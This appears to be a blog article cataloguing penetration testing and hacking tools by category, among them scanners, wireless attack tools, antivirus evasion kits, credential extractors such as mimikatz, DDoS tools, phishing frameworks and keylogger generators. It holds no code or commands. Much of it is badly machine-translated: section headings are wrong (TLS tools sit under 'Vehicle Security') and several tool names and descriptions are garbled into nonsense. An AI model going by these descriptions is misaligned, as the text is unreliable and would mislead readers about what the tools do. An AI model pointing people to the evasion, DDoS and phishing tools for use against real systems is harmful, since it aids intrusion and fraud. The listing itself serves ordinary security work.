Penetration testing and tools for hackers are more often used by security industries to test vulnerabilities in networks and applications. Here you can find a complete list of penetration testing and hacking tools that covers penetration testing operations in all environments.

List of tools for hackers and penetration testing

Online Resources

Penetration Testing Resources

Exploit development

OSINT Resources

Social Engineering Resources

Lock Pick Resources

Operating system

Hacking Utilities

Penetration Testing Distributions

  • Kali Distribution – GNU / Linux Designed for Digital Forensics and Hacker Penetration Testing
  • ArchStrike is the Arch GNU / Linux repository for security professionals and enthusiasts.
  • BlackArch – Arch GNU / Linux distribution with the best hacking tools for penetration testers and security researchers.
  • Network Security Toolkit (NST) is the Fedora boot operating system designed to provide easy access to best-of-breed open source network security applications.
  • Pentoo is a security-oriented live CD based on Gentoo.
  • BackBox is a Ubuntu-based distribution for penetration tests and security assessments.
  • Parrot is a distribution similar to Kali, with several architectures and 100 hacking tools.
  • Buscador is a GNU / Linux virtual machine preconfigured for online researchers.
  • Fedora Security Lab – Provides a secure test environment for working on security audits, forensics, rescue systems, and training in security testing methods.
  • Pentesters Framework – The distribution is organized around the standard for penetration testing (PTES), providing a curated collection of utilities that eliminates frequently unused toolchains.
  • Attifyos – The GNU / Linux distribution focuses on tools useful in assessing the security of the Internet of Things (IoT).

Piercing Test Docker

Multiparadigm Frame

  • Metasploit – Hacking tools for attacking security groups to check vulnerabilities and manage security assessments.
  • Armitage is a Java-based GUI for the Metasploit Framework.
  • Faraday is a multi-user integrated pentesting environment for red teams performing joint penetration tests, security audits and risk assessments.
  • ExploitPack is a graphical tool for automating penetration tests, which comes with a large number of ready-made exploits.
  • Pupi  – Cross-platform (Windows, Linux, macOS, Android) tool for remote administration and after operation,

vulnerability scanner

  • Nexpose is a commercial vulnerability assessment and risk management mechanism that integrates with Metasploit sold by Rapid7.
  • Nessus is a commercial vulnerability management, configuration, and conformance assessment platform sold by Tenable.
  • OpenVAS  is a free software implementation of the popular Nessus vulnerability assessment system.
  • Vuls is an agentless vulnerability scanner for GNU / Linux and FreeBSD written in Go.

Static analyzer

  • Brakeman – Static analysis Security vulnerability scanner for Ruby on Rails applications.
  • cppcheck is an extensible C / C ++ static error analyzer.
  • FindBugs is a free software static analyzer for finding errors in Java code.
  • sobelow is a security-oriented static analysis for the Phoenix framework.
  • Bandit is a security oriented static analyzer for python code.

Web Scanners

  • Nikto is a noisy but fast black box web server and web application vulnerability scanner.
  • Arachni – Scriptable framework for assessing the security of web applications.
  • w3af – hacking tools to attack and audit web applications.
  • Wapiti – Black box web application vulnerability scanner with integrated fuzzer.
  • SecApps – in-browser Web application Security testing suite.
  • WebReaver is a commercial web application vulnerability graphic scanner for macOS.
  • WPScan – hacker toolsBlack box WordPress vulnerability scanner.
  • CMS-explorer – identify specific modules, Plugins, components, and themes that run on various websites running on content management systems.
  • joomscan  is one of the best hacker tools for Joomla vulnerability scanner.
  • ACSTIS – automatic client-side pattern discovery (sandbox escape / bypass) for AngularJS.

Network Tools

  • zmap  – An open source network scanner that allows researchers to easily perform network research on the Internet.
  • Nmap is a free security scanner for network research and security auditing.
  • pig  – one of the hacking tools forGNU / Linuxcraft.
  • beskankovaya  – A utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
  • output tcpdump / libpcap  – A general package analyzer that runs under the command line.
  • Wireshark is a widely used graphical cross-platform network protocol analyzer.
  • Network-Tools.com -Web site of exhibition, offers an interface to many major network utilitamkak ping,  traceroute, whois, and more.
  • netsniff- ng -Swiss army army for sniffing the net.
  • Intercepter-NG is a multi functional network toolkit.
  • Sparta is a graphical interface that provides scriptable, customizable access to existing network scanning and enumeration tools.
  • dnschef  – Highly customizable DNS proxy for pentester.
  • DNSDumpster is one of the hacking tools for online DNS recon and search.
  • CloudFailDisable the server IP addresses hidden behind Cloudflare by searching for old database records and finding incorrect DNS settings.
  • dnsenum  – A Perl script that enumerates DNS information from a domain, tries to transfer zones, performs a brute-force dictionary style, and then searches back for results.
  • dnsmap  – One of the hacking tools for the passive DNS Network mapper.
  • dnsrecon  – One of the hacking tools for the DNS enumeration script.
  • dnstracer  – Determines where this DNS server gets information from and follows the chain of DNS servers.
  • passivedns client  library and query tool for querying multiple passive DNS providers.
  • passivedns is a network sniffer that logs all DNS server responses for use in passive DNS configuration.
  • Mass Scan – the best hacking tools for TCP port scanner, spews SYN packets asynchronously, scanning the entire Internet in less than 5 minutes.
  • Zarp is a network-oriented attack tool.
  • mitmproxy  -Interactive TLS-interception of HTTP proxies for penetration testers and software developers.
  • Morpheus -Tettercap Automated Hacking TCP / IPTools.
  • mallory -HTTP / HTTPS proxy via SSH.
  • SSH MITM – Interception of SSH connections with a proxy; all passwords and plaintext sessions are recorded to disk.
  • Netzob – reverse engineering, traffic generation and blurring communication protocols.
  • Det is a proof of concept for performing data filtering using one or more channels simultaneously.
  • pwnat – Punches holes in firewalls and NATs.
  • dsniff  – A collection of tools for network audit and pentesting.
  • tgcd  – A simple Unix network utility to expand the availability of TCP / IP-based network services outside of firewalls.
  • smbmap is a convenient SMB enumeration tool.
  • scapy  – Python based on an interactive package processing program and library.
  • Dshell is a network forensic analysis framework .
  • Debookee is a simple and powerful network traffic analyzer for macOS.
  • Dripcap  – Caffeine packet analyzer.
  • Printer Exploitation Toolkit (PRET)  – a tool for testing printer security, capable of connecting IP and USB, fuzzing and operating PostScript, PJL, and features of the PCL printer language.
  • Praeda  – Automated multi-function Data harvester printer for collecting useful data during a security assessment.
  • routersploit  – An open source exploitation framework similar to Metasploit, but designed for embedded devices.
  • evilgrade  – A modular structure to take advantage of poor update implementations by introducing fake updates.
  • XRay is a network (sub) domain discovery and intelligence automation tool.
  • Ettercap -complex, mature set for attacks like “machine in the middle.”
  • BetterCAP is a modular, portable and easily extensible MITM platform.
  • CrackMapExec – Swiss army knife for testing networks.
  • impacket  – A collection of Python classes for working with network protocols.

Wireless Hacking Tools

  • Aircrack-ng – a set of penetration and hacking testing tools for auditing wireless networks.
  • Kismet – wireless detector, sniffer and identifiers.
  • Reaver  – brute force attack against a WiFi protected installation.
  • Wifite is an automated wireless attack tool.
  • Fluxion is a suite of automated WPA attacks based on social engineering.

Vehicle Security

  • SSLyze is a fast and comprehensive TLS / SSL configuration analyzer to help identify mis-security configurations.
  • Tls_prober – imprint of SSL / TLS server implementation.
  • testssl.sh  is a command line tool that checks the server service on any port to support TLS / SSL ciphers, protocols, as well as some cryptographic flaws.

Web Exploitation

  • OWASP Zed Attack Proxy (ZAP)  – multifunctional, scripted HTTP – interception proxy and fazzer for testing penetration of web applications.
  • Fiddler  is a free cross-platform web debugging proxy server with convenient related tools.
  • Burp Suite is one of the hacking tools of an integrated platform for testing web application security.
  • autochrome – easy to install a test browser with all the relevant settings necessary for testing web applications that support its own Burp, from NCCGroup.
  • Browser Exploitation Framework (BeEF)  – a command and control server for delivering exploits to commanded web browsers.
  • Offensive Web Testing Framework (OWTF)  is a Python-based platform for testing web applications based on the OWASP testing guide.
  • WordPress Exploit Framework -Ruby framework for developing and using modules that help in testing the penetration of WordPress powered websites and systems.
  • WPSploit – Use website-based WordPress with Metasploit.
  • SQLmap is an automatic SQL injection and database capture tool.
  • tplmap  – Automatic injection of server-side templates and hacking of the web serverTools.
  • weevely3 -armed web shell.
  • Wappalyzer -Wappalyzer reveals the technologies used on websites.
  • WhatWeb fingerprint website .
  • BlindElephant is a fingerprint web application.
  • wafw00f- Identifies and Fingerprint Web Application Firewall (WAF) products.
  • fimap  – Find, prepare, audit, use, and even Google automatically for LFI / RFI errors.
  • Kadabra is an automatic exploiter and LFI scanner.
  • Cadimus  – LFI Scan and Exploit Tool.
  • liffy  – LFI Maintenance Tool.
  • Commix is ​​an automated universal tool for entering and operating operating system commands.
  • DVCS Ripper -Rip web available (distributed) version control systems: SVN / git / HG / bzr.
  • GitTools is one of the hacking tools that automatically finds and downloads Web-accessible .git storage.
  • sslstrip  –
    One of the hacking tools for demonstrating HTTPS stripping attacks.
  • sslstrip2 -SSLStrip version to defeat HSTS.
  • NoSQLmap is an automatic tool for injecting and capturing a NoSQL database.
  • VHostScan – a virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scripts, aliases and dynamic pages by default.
  • FuzzDB is a dictionary of attack patterns and primitives for introducing black box application errors and resource discovery.
  • An eyewitness is a tool for taking screenshots of websites, providing server header information, and identifying default credentials, if possible.
  • webscreenshot  – A simple script to take screenshots of a list of websites.

Hex Editor

  • HexEdit.JS – Browser Hex Editing.
  • Hexinator is the world’s best (proprietary, commercial) Hex editor.
  • Frhed is a binary editor for Windows.
  • 0xED is macOS’s own hex editor that supports plugins for displaying custom data types.

File Format Analysis Tools

  • Kaitai Struct – file formats and network protocols of the parsing language and web IDE generating Parsers in C ++, C #, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles is a binary data visualization and analysis tool.
  • Hachoir is a Python library for viewing and editing a binary stream in the form of a tree of fields and tools for extracting metadata.

Defense Evasion Tools

  • Veil – creating metasploit payloads that bypass conventional antivirus solutions.
  • shellsploit – generates custom shellcode, backdoors, injectors, optionally obfuscates each byte using encoders.
  • Hyperion -runtime encryptor for 32-bit portable executables (“PE  .exes”).
  • AntiVirus Evasion Tool (AVET)  – post-process exploits containing executable files intended for Windows computers to avoid recognition by antivirus software.
  • peCloak.py  -automatizes the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone is a multi-platform fork peCloak.py is an automated antivirus malware evasion tool.
  • UniByAv is a simple obfuscator that accepts raw shellcode and generates anti-virus friendly executable files using brute force, a 32-bit XOR key.

Hash Hacking Tools

  • John the Ripper is one of the best hacking tools for quickly cracking passwords.
  • Hashcat is another tool for cracking a faster hash cracker.
  • CeWL -creates custom word lists by moving the target’s website and collecting unique words.
  • JWT Cracker -simple hs256 JWT brute force token cracker.
  • Rar Crack -RARbruteforce cracker.
  • Bruteforce Wallet  – find the password of the encrypted wallet file (i.e.  wallet.dat).

Utilities for Windows

  • Sysinternals Suite – Sysinternals Troubleshooting Utilities.
  • Windows Credential Editor  – Verify login sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • mimikatz is a credential extraction tool for the Windows operating system.
  • PowerSploit – PowerShell Post-Production Environment.
  • Windows Exploit Suggester – Detects potential missing fixes on target.
  • Defendant -LLMNR, NBT-NS and Poisoner MDNS.
  • Bloodhound is a graphical Active Directory trust browser.
  • Empire is a pure PowerShell agent after use.
  • Fibratus is a tool for researching and tracking the Windows kernel.
  • wePWNise generates architecture-independent VBA code for use in Office documents or templates, and automates crawling software for application management and use.
  • redsnarf -a means after operation for receiving hashes of passwords and credentials from Windows workstations, servers and domain controllers.
  • Magic Unicorn is a shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell macros, HTML applications (HTAs) or  certutil(using fake certificates).
  • Deathstar is a Python script that uses the Empire RESTful API to automate domain administrator privileges in Active Directory environments.

Utilities for GNU / Linux

Utilities for macOS

  • Bella is a pure Python after-use data mining and remote administration tool for macOS.

DDoS Tools

  • LOIC -Open Source network stress tool for Windows.
  • JS LOIC -JavaScript in the browser version of LOIC.
  • SlowLoris -DoS tool that uses low bandwidth on the attacking side.
  • The HOIC is an updated version of the low-orbit ion cannon that has “boosters” to circumvent common countermeasures.
  • T50 is a faster mains voltage tool.
  • UFONet – Uses OSI layer 7 HTTP to create / control “zombies” and conduct various attacks using; GET/  POST, multithreading, proxies, origin substitution methods, cache evasion methods, etc.

Social Engineering Tools

  • Social Engineer Toolkit (SET)  is an open source pentesting framework designed for social engineering involving a number of custom attack vectors to make believable attacks quickly.
  • King Phisher is one of the phishing campaign toolkit hack tools used to create and manage multiple simultaneous phishing attacks with user email and server content.
  • The Evilginx -MITM attack framework is used to phishing credentials and session cookies from any web service.
  • Spousal Machine  – Automated phishing attacks on WiFi networks.
  • Catphish is a phishing and corporate espionage tool written in Ruby.
  • Beelogger  – A tool for generating a keyloger .

OSINT Tools

  • Maltego is one of hacker tools and proprietary open source intelligence and forensics software from Paterva.
  • the Harvester is the email, subdomain, and harvester people’s names.
  • creepy- location OSINT tool.
  • metagoofil  – Metadata reaper .
  • Google Hacking Database – Google dorks database can be used for reconnaissance.
  • Google dorks – General Google dorks and others you probably don’t know.
  • GooDork – Google Command Line Dorking Tool.
  • dork-cli  – Command line Google dork tool.
  • Censys  – Collects host and website data through daily ZMap and ZGrab scans.
  • Shodan is the world’s first search engine for Internet-connected devices.
  • recon-ng is one of the full-featured hacking tools of the web Reconnaissance framework, written in Python.
  • github-dorks -CLI tool for scanning Github REPO / organization potential leakage of confidential information.
  • vcsmap  – A plug-in based on a tool for scanning public version control systems for confidential information.
  • Spiderfoot is a multi-functional OSINT automation tool with a web interface and report visualization.
  • BinGoo -GNU / Linux bash-based Bing and Google Dorking tool.
  • fast-recon – execution of Google dorks against a domain.
  • snitch – collecting information through morons.
  • Sn1per -ons hacking tools for Pentest Recon automatic scanner.
  • Threat Crowd is a threat search engine.
  • Virus Total -VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans and all types of malware.
  • The data block  is an OSINT visualizer using Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye backstage.
  • AQUATONE is a subdomain detection tool using various open sources that generates a report that can be used as input to other tools.
  • Intrigue – OSINT & Attack Surface discovery framework automated platform with powerful API, UI and Kli.
  • ZoomEye is a cyberspace search engine that allows the user to find specific network components.

Tools for Anonymity

  • Tor is free software and an onion routed overlay network that helps you protect yourself from traffic analysis.
  • OnionScan is one of the hacking tools for researching the darkness Web by searching for operational security problems introduced by the operators of the hidden Tor service.
  • I2P – Invisible Internet project.
  • Nipe- script for redirecting all traffic from the machine to the Tor network.
  • What every browser knows about you  is a complete discovery page to check the configuration of your own web browser for privacy and identity leakage.

Reverse Engineering Tools

  • Interactive Disassembler (IDA Pro) – a proprietary multiprocessor disassembler and debugger for Windows, GNU / Linux or macOS; also has a free version of  IDA Free  .
  • WDK / WinDbg  – a set of Windows and WinDbg drivers.
  • OllyDbg -x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 is an open source, cross-back engineering framework.
  • x64dbg is an open source x64 / x32 debugger for windows.
  • Immunity Debugger is a powerful way to write exploits and analyze malware.
  • Evan’s debugger is an OllyDbg-like debugger for GNU / Linux.
  • Medusa  is an open source cross-platform interactive disassembler.
  • plasma is an interactive disassembler for x86 / ARM / MIPS. Generates indented pseudocode with color syntax code.
  • peda  – Help develop Python exploits for GDB.
  • dnSpy  is one of the hack tools for reverse engineering .NET assemblies.
  • Sidewalk  – A fast, easy-to-use tool for analyzing, reverse engineering and extracting firmware images.
  • Pyrebox -Python scriptable Reverse Engineering sandbox from Cisco-Talos.
  • Voltron is an extensible UI toolkit debugger written in Python.
  • Capstone – lightweight multi-platform, multi-arch disassembly of the frame.
  • rVMI  – Debugger on steroids; Check user space processes, kernel drivers, and preboot environments in one tool.
  • Frida  – Dynamic instrumentation toolkit for developers, reverse engineers and security researchers.

Physical access facilities

  • LAN Turtle is a hidden “USB Ethernet Adapter” that provides remote access, intelligence and MITM capabilities when installed on a local network.
  • USB Rubber Ducky is a customizable key injection platform that masquerades as a USB thumbdrive.
  • Poisontap- siphons cookies, provides an internal (LAN-side) router and installs a web backdoor on locked computers.
  • WiFi Pineapple is a wireless audit and penetration testing platform.
  • Proxmark3- RFID / NFC cloning, playback and spoofing tools are often used to analyze and attack contactless cards / readers, wireless keys / key fobs and much more.

Side channel tool

  • ChipWhisperer is a complete chain of open source tools for analyzing side channel power and crashes.

CTF tools

  • ctf-tools – a collection of installation scripts for installing various security research tools is easily and quickly deployed to new machines.
  • Pwntools is a quick exploit development platform designed for use in CTFs.
  • RsaCtfTool – decryption of data encrypted using weak RSA keys, and recovery of private keys from public keys using various automatic attacks.

Penetration Test Report Templates

  • Public Pentesting Reports – A curated list of public penetration test reports issued by several consulting firms and academic security groups.
  • Pentesting report  template – testandverification.com template.
  • Pentesting report  template – hitachi-systems-security.com template.
  • Pentesting Report  Template – lucideus.com template.
  • Pentesting report  template – crest-approved.org template.
  • Pentesting Report  Template – pcisecuritystandards.org template.
kali, Kali Linux, Security & Hacking